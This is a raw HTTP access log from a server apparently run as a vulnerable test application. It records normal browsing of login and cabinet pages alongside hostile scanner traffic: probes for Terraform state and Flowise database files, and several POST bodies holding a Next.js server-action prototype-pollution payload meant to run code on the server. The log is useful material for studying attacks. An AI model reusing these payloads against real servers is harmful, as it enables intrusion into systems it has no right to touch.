X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Priority: u=1, i
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45114
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 17:09:04] === HTTP Request ===
[2026-03-11 17:09:04] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:45114
===================
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Referer: https://admin.vulnberries.ru/
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Dest: empty
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45114
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 17:09:04] === HTTP Request ===
[2026-03-11 17:09:04] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:45122
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Priority: u=1, i
Cookie: auth=sess_1773233005829118282; user_id=9
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45122
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 17:09:04] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.105:39722
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-11 17:02:06] === HTTP Request ===
[2026-03-11 17:02:06] Main page accessed - IP: 85.142.100.105:39706
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.105:39706
Path: /
URL: /
Method: GET
[2026-03-11 17:02:06] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50027
Path: /.terraform.tfstate.lock.info
URL: /.terraform.tfstate.lock.info
Method: GET
[2026-03-11 17:01:05] === HTTP Request ===
[2026-03-11 16:58:49] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:46544
===================
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.vulnberries.ru/cabinet?user=17
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Via: 2.0 Caddy
Priority: u=1, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46544
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 16:58:49] === HTTP Request ===
[2026-03-11 16:58:49] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:46544
===================
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-GB,en;q=0.9
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/cabinet?user=17
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46544
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 16:58:49] === HTTP Request ===
[2026-03-11 16:58:48] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:46544
===================
X-Forwarded-Proto: https
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/cabinet?user=17
Accept-Language: en-GB,en;q=0.9
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=1, i
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46544
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 16:58:48] === HTTP Request ===
[2026-03-11 16:58:47] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:46544
===================
Sec-Fetch-Dest: empty
Priority: u=1, i
Accept-Language: en-GB,en;q=0.9
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Mode: cors
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46544
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 16:58:47] === HTTP Request ===
[2026-03-11 16:58:46] Main page accessed - IP: 172.30.0.12:46544
===================
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-GB,en;q=0.9
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/cabinet?user=17
Priority: u=1, i
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Mode: cors
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46544
Path: /
URL: /
Method: GET
[2026-03-11 16:58:46] === HTTP Request ===
===================
Referer: https://admin.vulnberries.ru/cabinet?user=17
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Mode: no-cors
Via: 2.0 Caddy
Accept-Language: en-GB,en;q=0.9
X-Forwarded-For: 45.85.105.205
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46544
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-11 16:58:40] === HTTP Request ===
[2026-03-11 16:58:40] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:46544
===================
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/login
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
Accept-Language: en-GB,en;q=0.9
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46544
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 16:58:40] === HTTP Request ===
[2026-03-11 16:55:36] Login page accessed - IP: 172.30.0.12:43756
===================
Priority: u=0, i
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Accept-Language: en-GB,en;q=0.9
X-Forwarded-Proto: https
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43756
Path: /login
URL: /login
Method: GET
[2026-03-11 16:55:36] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/
Sec-Fetch-Mode: no-cors
Accept-Language: en-GB,en;q=0.9
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43756
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-11 16:55:36] === HTTP Request ===
===================
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Priority: u=0
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/css,*/*;q=0.1
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Dest: style
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-For: 45.85.105.205
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43742
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-11 16:55:36] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept: */*
Sec-Ch-Ua-Platform: "macOS"
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Dest: script
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/
Accept-Language: en-GB,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Mode: no-cors
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Priority: u=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43742
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-11 16:55:36] === HTTP Request ===
[2026-03-11 16:55:36] Main page accessed - IP: 172.30.0.12:43742
===================
Sec-Fetch-Dest: document
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Accept-Language: en-GB,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Priority: u=0, i
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "macOS"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:43742
Path: /
URL: /
Method: GET
[2026-03-11 16:55:36] === HTTP Request ===
[2026-03-11 16:49:02] Main page accessed - IP: 172.30.0.12:39066
===================
Priority: u=1, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: cors
Referer: https://admin.vulnberries.ru/cabinet?user=17
Accept: */*
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua-Platform: "macOS"
Cookie: auth=sess_1773233005829118282; user_id=9
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Via: 2.0 Caddy
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39066
Path: /
URL: /
Method: GET
[2026-03-11 16:49:02] === HTTP Request ===
[2026-03-11 16:48:49] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:39066
===================
Sec-Fetch-Mode: cors
Sec-Ch-Ua-Mobile: ?0
Priority: u=1, i
X-Forwarded-Proto: https
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/login
X-Forwarded-For: 45.85.105.205
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Cookie: auth=sess_1773233005829118282; user_id=9
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br, zstd
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39066
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 16:48:49] === HTTP Request ===
[2026-03-11 16:48:49] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:39066
===================
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Cookie: auth=sess_1773233005829118282; user_id=9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
X-Forwarded-For: 45.85.105.205
Sec-Ch-Ua-Platform: "macOS"
Priority: u=1, i
Accept: */*
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/login
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Dest: empty
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39066
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-11 16:48:49] === HTTP Request ===
[2026-03-11 16:48:45] Login page accessed - IP: 172.30.0.12:39066
===================
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,ru;q=0.7
Upgrade-Insecure-Requests: 1
Cookie: auth=sess_1773233005829118282; user_id=9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 45.85.105.205
Sec-Fetch-Dest: document
Sec-Ch-Ua-Mobile: ?0
Priority: u=0, i
Cache-Control: max-age=0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39066
Path: /login
URL: /login
Method: GET
[2026-03-11 16:48:45] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:49254
Path: /jars
URL: /jars
Method: GET
[2026-03-11 15:12:30] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50052
Path: /flowise.sqlite
URL: /flowise.sqlite
Method: GET
[2026-03-11 15:03:37] === HTTP Request ===
[2026-03-11 14:59:16] Main page accessed - IP: 172.30.0.12:34338
===================
X-Forwarded-For: 185.22.152.250
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.39
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34338
Path: /
URL: /
Method: GET
[2026-03-11 14:59:16] === HTTP Request ===
===================
------WebKitFormBoundaryx460117315237--
------WebKitFormBoundaryx460117315237
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx460117315237
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 264967+true+1736508;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx460117315237
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx460117315237
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_460117315237
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53624
Path: /api/route
URL: /api/route
Method: POST
[2026-03-11 14:50:53] === HTTP Request ===
===================
------WebKitFormBoundaryx392241533515--
------WebKitFormBoundaryx392241533515
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx392241533515
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 85278+true+4599563;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx392241533515
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx392241533515
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
X-Nextjs-Html-Request-Id: ilovepoop_392241533515
Accept-Encoding: gzip, deflate
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53620
Path: /app
URL: /app
Method: POST
[2026-03-11 14:50:51] === HTTP Request ===
===================
------WebKitFormBoundaryx1173473387101--
------WebKitFormBoundaryx1173473387101
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1173473387101
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 242586+true+4837350;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1173473387101
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1173473387101
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1173473387101
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 522
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53608
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-11 14:50:51] === HTTP Request ===
===================
------WebKitFormBoundaryx48643148087--
------WebKitFormBoundaryx48643148087
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx48643148087
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 49358+true+985517;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx48643148087
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx48643148087
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Content-Length: 512
X-Nextjs-Html-Request-Id: ilovepoop_48643148087
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53602
Path: /api
URL: /api
Method: POST
[2026-03-11 14:50:51] === HTTP Request ===
===================
------WebKitFormBoundaryx49373048088--
------WebKitFormBoundaryx49373048088
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx49373048088
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 172513+true+286199;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx49373048088
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx49373048088
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_49373048088
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53564
Path: /_next
URL: /_next
Method: POST
[2026-03-11 14:50:51] === HTTP Request ===
[2026-03-11 14:50:50] Main page accessed - IP: 195.3.221.86:53558
===================
------WebKitFormBoundaryx94990151721--
------WebKitFormBoundaryx94990151721
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx94990151721
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 21955+true+4326584;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx94990151721
Connection: close
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_94990151721
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx94990151721
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:53558
Path: /
URL: /
Method: POST
[2026-03-11 14:50:50] === HTTP Request ===
===================
X-Forwarded-For: 94.25.169.30
Sec-Ch-Ua: "Chromium";v="145", "Not:A-Brand";v="99"
